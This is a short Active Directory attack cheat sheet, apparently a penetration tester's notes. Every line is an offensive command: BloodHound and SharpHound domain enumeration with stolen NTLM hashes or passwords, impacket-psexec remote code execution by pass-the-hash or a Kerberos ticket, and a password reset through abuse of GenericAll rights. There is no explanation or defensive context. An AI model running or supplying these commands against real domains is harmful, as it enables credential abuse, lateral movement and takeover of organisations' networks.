bloodhound-ce-python -u '[email protected]' --hashes ':ntlm-hash-here' -d 'DOMAIN.COM' -ns TARGET_IP --dns-tcp -c All --zip
With certificate
impacket-psexec -k -no-pass -target-ip DC_IP -dc-ip DC_IP USERNAME@FQDN
With hashes
impacket-psexec 'TARGET_FQDN/Administrator@TARGET_IP' -hashes :'YOUR_NTLM_HASH'
.\\SharpHound.exe -c ALL -s --recursedomains
.\\sharphound.exe -c All --domain dev.DOMAIN.com --ldapusername username --ldappassword 'Password123!'
GenericAll on a usernet user TARGET_USER Password123 /domain